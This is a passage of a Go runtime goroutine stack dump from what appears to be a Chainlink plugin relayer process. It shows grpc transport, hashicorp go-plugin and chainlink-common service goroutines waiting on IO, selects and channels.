/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1860 +0xb85
google.golang.org/grpc.(*Server).serveStreams.func2.1()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065 +0x7f
created by google.golang.org/grpc.(*Server).serveStreams.func2 in goroutine 234
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1076 +0x11d
goroutine 216 [select]:
github.com/smartcontractkit/chainlink-common/pkg/sqlutil/pg.(*StatsReporter).loop(0x3b96a77582d0, {0x2860080, 0x3b96a7758320})
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/pg/stats.go:124 +0x316
created by github.com/smartcontractkit/chainlink-common/pkg/sqlutil/pg.(*StatsReporter).Start.func1 in goroutine 1
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/pg/stats.go:99 +0x110
goroutine 227 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x73191a076a00, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a769e060?, 0x3b96a751c000?, 0x1)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Read(0x3b96a769e060, {0x3b96a751c000, 0x1000, 0x1000})
/usr/local/go/src/internal/poll/fd_unix.go:165 +0x2ae
os.(*File).read(...)
/usr/local/go/src/os/file_posix.go:30
os.(*File).Read(0x3b96a7192018, {0x3b96a751c000?, 0x400?, 0x2017800?})
/usr/local/go/src/os/file.go:144 +0x4f
bufio.(*Reader).Read(0x3b96a7414720, {0x3b96a77cb000, 0x400, 0x0?})
/usr/local/go/src/bufio/bufio.go:245 +0x197
github.com/hashicorp/go-plugin.copyChan({0x2884578, 0x3b96a76a0000}, 0x3b96a6d13260, {0x2837600, 0x3b96a7192018?})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:184 +0x1b5
created by github.com/hashicorp/go-plugin.newGRPCStdioServer in goroutine 1
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:40 +0xcc
goroutine 228 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x73191a076600, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a769e120?, 0x3b96a720d000?, 0x1)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Read(0x3b96a769e120, {0x3b96a720d000, 0x1000, 0x1000})
/usr/local/go/src/internal/poll/fd_unix.go:165 +0x2ae
os.(*File).read(...)
/usr/local/go/src/os/file_posix.go:30
os.(*File).Read(0x3b96a7192028, {0x3b96a720d000?, 0x400?, 0x2017800?})
/usr/local/go/src/os/file.go:144 +0x4f
bufio.(*Reader).Read(0x3b96a7414f20, {0x3b96a6d55000, 0x400, 0x0?})
/usr/local/go/src/bufio/bufio.go:245 +0x197
github.com/hashicorp/go-plugin.copyChan({0x2884578, 0x3b96a76a0000}, 0x3b96a6d13a40, {0x2837600, 0x3b96a7192028?})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:184 +0x1b5
created by github.com/hashicorp/go-plugin.newGRPCStdioServer in goroutine 1
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:41 +0x13e
goroutine 229 [chan receive, 1 minutes]:
github.com/hashicorp/go-plugin.Serve.func3()
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:468 +0x72
created by github.com/hashicorp/go-plugin.Serve in goroutine 1
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:465 +0x1395
goroutine 230 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x73191a076e00, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a7104000?, 0x20?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Accept(0x3b96a7104000)
/usr/local/go/src/internal/poll/fd_unix.go:613 +0x28c
net.(*netFD).accept(0x3b96a7104000)
/usr/local/go/src/net/fd_unix.go:150 +0x29
net.(*UnixListener).accept(0x3b96a7a15df8?)
/usr/local/go/src/net/unixsock_posix.go:172 +0x16
net.(*UnixListener).Accept(0x3b96a7985440)
/usr/local/go/src/net/unixsock.go:267 +0x30
google.golang.org/grpc.(*Server).Serve(0x3b96a7700008, {0x28577a0, 0x3b96a6c4a0a8})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:921 +0x45c
github.com/hashicorp/go-plugin.(*GRPCServer).Serve(0x3b96a7982120, {0x28577a0?, 0x3b96a6c4a0a8?})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_server.go:156 +0x5d
created by github.com/hashicorp/go-plugin.Serve in goroutine 1
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:497 +0x151d
goroutine 261 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 254
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 232 [select]:
google.golang.org/grpc/internal/transport.(*controlBuffer).get(0x3b96a6c6fe00, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420 +0x10a
google.golang.org/grpc/internal/transport.(*loopyWriter).run(0x3b96a73820a0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597 +0x78
google.golang.org/grpc/internal/transport.NewServerTransport.func3()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:342 +0xdc
created by google.golang.org/grpc/internal/transport.NewServerTransport in goroutine 231
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:340 +0x18e7
goroutine 233 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*http2Server).keepalive(0x3b96a7534000)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:1203 +0x1e5
created by google.golang.org/grpc/internal/transport.NewServerTransport in goroutine 231
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:363 +0x1929
goroutine 234 [IO wait]:
internal/poll.runtime_pollWait(0x73191a076200, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0xd?, 0xa?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).RawRead(0x3b96a7104780, 0x3b96a776e660)
/usr/local/go/src/internal/poll/fd_unix.go:710 +0x125
net.(*rawConn).Read(0x3b96a7192080, 0x3b96a799bbb8?)
/usr/local/go/src/net/rawconn.go:44 +0x36
google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady(0x3b96a78620f0, 0x3b96a799bc18?, {0x2853ab8, 0x3b96a7985cb0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114 +0xa7
google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read(0x3b96a75cc230, {0x3b96a769c044, 0x9, 0x3b96a799bc58?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221 +0x174
io.ReadAtLeast({0x283e020, 0x3b96a75cc230}, {0x3b96a769c044, 0x9, 0x9}, 0x9)
/usr/local/go/src/io/io.go:335 +0x8e
io.ReadFull(...)
/usr/local/go/src/io/io.go:354
golang.org/x/net/http2.readFrameHeader({0x3b96a769c044, 0x9, 0x8f935a?}, {0x283e020?, 0x3b96a75cc230?})
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250 +0x65
golang.org/x/net/http2.(*Framer).ReadFrameHeader(0x3b96a769c000)
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513 +0x6b
google.golang.org/grpc/internal/transport.(*framer).readFrame(0x3b96a7104880)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493 +0x45
google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams(0x3b96a7534000, {0x2860048, 0x3b96a7985e60}, 0x3b96a7694000)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:638 +0xff
google.golang.org/grpc.(*Server).serveStreams(0x3b96a7700008, {0x2860128?, 0x41e1780?}, {0x28616f8, 0x3b96a7534000}, {0x2873c68?, 0x3b96a7192078?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059 +0x368
google.golang.org/grpc.(*Server).handleRawConn.func1()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993 +0x56
created by google.golang.org/grpc.(*Server).handleRawConn in goroutine 231
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:992 +0x1cb
goroutine 189 [select, 1 minutes]:
github.com/hashicorp/go-plugin.(*grpcStdioServer).StreamStdio(0x3b96a776e1d0, 0x209e200?, {0x2871a70, 0x3b96a7a0c5e0})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:61 +0x10c
github.com/hashicorp/go-plugin/internal/plugin._GRPCStdio_StreamStdio_Handler({0x209e200, 0x3b96a776e1d0}, {0x286dfb0, 0x3b96a7a0ac30})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_stdio_grpc.pb.go:117 +0x110
github.com/smartcontractkit/chainlink-common/pkg/loop.newServerFn.(*ServerMetrics).StreamServerInterceptor.StreamServerInterceptor.func9({0x209e200, 0x3b96a776e1d0}, {0x286e868, 0x3b96a70c7020}, 0x20?, 0x281a368)
/go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:35 +0x2c6
google.golang.org/grpc.getChainStreamHandler.func1({0x209e200?, 0x3b96a776e1d0?}, {0x286e868?, 0x3b96a70c7020?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1573 +0x153
github.com/smartcontractkit/chainlink-common/pkg/contexts.(*CREServerInterceptor).StreamServerInterceptor(0x3b96a776e3c0, {0x209e200, 0x3b96a776e1d0}, {0x286e550, 0x3b96a769a000}, 0x3b96a7278168?, 0x3b96a7142400)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/contexts/grpc.go:68 +0xc5
google.golang.org/grpc.NewServer.chainStreamServerInterceptors.chainStreamInterceptors.func2({0x209e200, 0x3b96a776e1d0}, {0x286e550, 0x3b96a769a000}, 0x3b96a7278168, 0x3b96a71423c0?)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1564 +0x7c
google.golang.org/grpc.(*Server).processStreamingRPC(0x3b96a7700008, {0x2860048, 0x3b96a7a0aa20}, 0x3b96a75d8340, 0x3b96a7985a70, 0x40ad6a0, 0x0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1723 +0x1171
google.golang.org/grpc.(*Server).handleStream(0x3b96a7700008, {0x28616f8, 0x3b96a7534000}, 0x3b96a75d8340)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1860 +0xb85
google.golang.org/grpc.(*Server).serveStreams.func2.1()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065 +0x7f
created by google.golang.org/grpc.(*Server).serveStreams.func2 in goroutine 234
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1076 +0x11d
goroutine 190 [select, 1 minutes]:
github.com/hashicorp/go-plugin.(*gRPCBrokerServer).StartStream.func1()
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:77 +0xf5
created by github.com/hashicorp/go-plugin.(*gRPCBrokerServer).StartStream in goroutine 188
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:75 +0x10a
goroutine 260 [select]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a7278390, 0x3b96a6c932d0, 0x3b96a7a0b9b0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 251
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 237 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776f430, {0x2860080, 0x3b96a7862a50})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 238 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776f460, {0x2860080, 0x3b96a7862aa0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 239 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776f490, {0x2860080, 0x3b96a7862af0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 259 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*controlBuffer).get(0x3b96a7142880, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420 +0x10a
google.golang.org/grpc/internal/transport.(*loopyWriter).run(0x3b96a7a0e5a0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597 +0x78
google.golang.org/grpc/internal/transport.NewHTTP2Client.func6()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:471 +0xd2
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 244
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:469 +0x23bb
goroutine 241 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776fa40, {0x2860080, 0x3b96a7862d20})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 242 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776fa70, {0x2860080, 0x3b96a7862d70})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 243 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a776faa0, {0x2860080, 0x3b96a7862dc0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 245 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a6c8b800, {0x2860080, 0x3b96a7862ff0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 262 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 256
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 246 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a6c8b860, {0x2860080, 0x3b96a7863040})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 247 [chan receive, 1 minutes]:
google.golang.org/grpc/internal/grpcsync.(*CallbackSerializer).run(0x3b96a6c8bb20, {0x2860080, 0x3b96a7863090})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:88 +0xe5
created by google.golang.org/grpc/internal/grpcsync.NewCallbackSerializer in goroutine 191
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/grpcsync/callback_serializer.go:52 +0x11a
goroutine 168 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x7319183f3c00, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0xe?, 0x10000000b?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).RawRead(0x3b96a6f1c600, 0x3b96a786e170)
/usr/local/go/src/internal/poll/fd_unix.go:710 +0x125
net.(*rawConn).Read(0x3b96a7b0a018, 0x3b96a705cca0?)
/usr/local/go/src/net/rawconn.go:44 +0x36
google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady(0x3b96a7078370, 0x3b96a705cd00?, {0x2853ab8, 0x3b96a7985cb0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114 +0xa7
google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read(0x3b96a764e620, {0x3b96a712c204, 0x9, 0x237ce00?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221 +0x174
io.ReadAtLeast({0x283e020, 0x3b96a764e620}, {0x3b96a712c204, 0x9, 0x9}, 0x9)
/usr/local/go/src/io/io.go:335 +0x8e
io.ReadFull(...)
/usr/local/go/src/io/io.go:354
golang.org/x/net/http2.readFrameHeader({0x3b96a712c204, 0x9, 0x3b9600000000?}, {0x283e020?, 0x3b96a764e620?})
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250 +0x65
golang.org/x/net/http2.(*Framer).ReadFrameHeader(0x3b96a712c1c0)
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513 +0x6b
google.golang.org/grpc/internal/transport.(*framer).readFrame(0x3b96a6f1c880)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493 +0x45
google.golang.org/grpc/internal/transport.(*http2Client).reader(0x3b96a6ed5688, 0x3b96a764e690)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:1669 +0x1ba
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 240
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:413 +0x1dfe
goroutine 193 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x7319183f3a00, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0xf?, 0x500191864e168?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).RawRead(0x3b96a776c400, 0x3b96a7a0c8b0)
/usr/local/go/src/internal/poll/fd_unix.go:710 +0x125
net.(*rawConn).Read(0x3b96a6d8c278, 0x3b96a7985cb0?)
/usr/local/go/src/net/rawconn.go:44 +0x36
google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady(0x3b96a6f04640, 0x48e865?, {0x2853ab8, 0x3b96a7985cb0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114 +0xa7
google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read(0x3b96a7a01180, {0x3b96a754a044, 0x9, 0x3b96a6d8c201?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221 +0x174
io.ReadAtLeast({0x283e020, 0x3b96a7a01180}, {0x3b96a754a044, 0x9, 0x9}, 0x9)
/usr/local/go/src/io/io.go:335 +0x8e
io.ReadFull(...)
/usr/local/go/src/io/io.go:354
golang.org/x/net/http2.readFrameHeader({0x3b96a754a044, 0x9, 0x3b9600000000?}, {0x283e020?, 0x3b96a7a01180?})
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250 +0x65
golang.org/x/net/http2.(*Framer).ReadFrameHeader(0x3b96a754a000)
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513 +0x6b
google.golang.org/grpc/internal/transport.(*framer).readFrame(0x3b96a776c600)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493 +0x45
google.golang.org/grpc/internal/transport.(*http2Client).reader(0x3b96a7048008, 0x3b96a7a011f0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:1669 +0x1ba
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 244
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:413 +0x1dfe
goroutine 258 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*controlBuffer).get(0x3b96a6dc4880, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420 +0x10a
google.golang.org/grpc/internal/transport.(*loopyWriter).run(0x3b96a7382780)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597 +0x78
google.golang.org/grpc/internal/transport.NewHTTP2Client.func6()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:471 +0xd2
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 240
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:469 +0x23bb
goroutine 139 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x7319183f3800, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x10?, 0x3b96a74ad018?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).RawRead(0x3b96a6e28180, 0x3b96a740c2b0)
/usr/local/go/src/internal/poll/fd_unix.go:710 +0x125
net.(*rawConn).Read(0x3b96a6d023a0, 0x3b96a7985cb0?)
/usr/local/go/src/net/rawconn.go:44 +0x36
google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady(0x3b96a6dd80a0, 0x48e865?, {0x2853ab8, 0x3b96a7985cb0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114 +0xa7
google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read(0x3b96a6f1a0e0, {0x3b96a73cc044, 0x9, 0x3b96a6d02301?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221 +0x174
io.ReadAtLeast({0x283e020, 0x3b96a6f1a0e0}, {0x3b96a73cc044, 0x9, 0x9}, 0x9)
/usr/local/go/src/io/io.go:335 +0x8e
io.ReadFull(...)
/usr/local/go/src/io/io.go:354
golang.org/x/net/http2.readFrameHeader({0x3b96a73cc044, 0x9, 0x3b9600000000?}, {0x283e020?, 0x3b96a6f1a0e0?})
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250 +0x65
golang.org/x/net/http2.(*Framer).ReadFrameHeader(0x3b96a73cc000)
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513 +0x6b
google.golang.org/grpc/internal/transport.(*framer).readFrame(0x3b96a6e28380)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493 +0x45
google.golang.org/grpc/internal/transport.(*http2Client).reader(0x3b96a73ce008, 0x3b96a6f1a150)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:1669 +0x1ba
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 248
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:413 +0x1dfe
goroutine 140 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*controlBuffer).get(0x3b96a6f007c0, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420 +0x10a
google.golang.org/grpc/internal/transport.(*loopyWriter).run(0x3b96a770c0a0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597 +0x78
google.golang.org/grpc/internal/transport.NewHTTP2Client.func6()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:471 +0xd2
created by google.golang.org/grpc/internal/transport.NewHTTP2Client in goroutine 248
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_client.go:469 +0x23bb
goroutine 249 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a6c4b290, 0x3b96a7a3ce70, 0x3b96a7606ea0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 250 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.func1({0x2860080, 0x3b96a7078460})
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:100 +0xe5
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.(*Engine).Go.func2()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 251 [select]:
github.com/smartcontractkit/chainlink-common/pkg/utils/mailbox.(*Monitor).monitorLoop(0x3b96a7764c60)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/mailbox/mailbox_prom.go:66 +0x125
created by main.(*pluginRelayer).NewRelayer.(*Monitor).Start.func1 in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/mailbox/mailbox_prom.go:44 +0x56
goroutine 169 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 250
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 252 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/utils.(*SleeperTask).workerLoop(0x3b96a7582d80)
